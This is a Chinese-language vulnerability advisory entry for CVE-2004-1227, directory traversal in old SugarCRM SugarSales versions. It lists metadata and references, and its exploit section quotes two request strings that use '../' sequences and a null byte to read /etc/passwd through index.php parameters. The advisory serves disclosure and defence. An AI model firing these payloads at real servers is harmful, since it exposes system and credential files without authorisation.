SugarCRM SugarSales 多处 目录遍历漏洞

SugarCRM SugarSales 多处 目录遍历漏洞

漏洞ID 1108295 漏洞类型 路径遍历
发布时间 2004-11-23 更新时间 2005-10-20
图片[1]-SugarCRM SugarSales 多处 目录遍历漏洞-安全小百科CVE编号 CVE-2004-1227
图片[2]-SugarCRM SugarSales 多处 目录遍历漏洞-安全小百科CNNVD-ID CNNVD-200501-038
漏洞平台 PHP CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/24769
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200501-038
|漏洞详情
SugarCRM是一套基于Web的客户关系管理系统。SugarSales2.0.1c及之前版本中存在目录遍历漏洞。远程攻击者可利用到index.php的module,action,theme参数,或login.php的theme参数,以及其他可能同样存在漏洞参数或脚,通过使用’..’序列,读取任意文件并可能执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/11740/info
 
SugarCRM is reported prone to multiple vulnerabilites arising from insufficient sanitization of user-supplied input. These issues can a remote attacker to carry out cross-site scripting, HTML injection, SQL injection and directory traversal attacks.

/index.php?module=Opportunities&action=../../../../../../../../etc /passwd%00&advanced=true
/index.php?action=DetailView&module=../../../../../etc/passwd%00
|参考资料

来源:XF
名称:sugarcrm-directory-traversal(18326)
链接:http://xforce.iss.net/xforce/xfdb/18326
来源:BID
名称:11740
链接:http://www.securityfocus.com/bid/11740
来源:BUGTRAQ
名称:20041213SugarSalesMultipleVulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110295433323795&w;=2
来源:MISC
链接:http://www.gulftech.org/?node=research&article;_id=00053-120104

相关推荐: Check Point Firewall-1 Session Agent Impersonation Vulnerability

Check Point Firewall-1 Session Agent Impersonation Vulnerability 漏洞ID 1104878 漏洞类型 Unknown 发布时间 1998-09-24 更新时间 1998-09-24 CVE编号 N…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享